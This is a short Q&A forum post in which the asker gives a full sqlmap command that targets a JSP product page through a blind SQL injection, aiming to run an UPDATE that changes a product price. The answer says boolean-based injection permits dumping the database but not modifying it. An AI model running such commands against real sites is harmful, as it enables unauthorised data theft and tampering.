# How to update table with sqlmap and without stacked queries?

Tags: sql-injection, apache, sqlmap, oracle

down vote
favorite
I'm trying to use following code

```
sqlmap -u "http://exp.com/portal/pd.jsp action=edit&info=products&sub_info=price" 
--cookie="JSESSIONID....." --dbms Oracle -D PRODUCTS -T PRICE --threads 10
--sql-query="UPDATE PRICE SET PRICE ='100' WHERE PRODUCTID LIKE '7534' AND PRODUCTCODE = '73546'"
```

I checked this link before and it is injectable in info parameter (boolean-based blind). the result of execution of above code is:

```
warning: "execution of custom SQL queries is only available when stacked queries are supported"
```

Is there any workaround in order to do this?

This website is running on Apache, JSP and Oracle.

Answer (score 1):

No workaround here. You can usually dump the entire database with a boolean based sql injection vulnerability but you cant perform updates.

You can extract but cannot insert or modify existing data.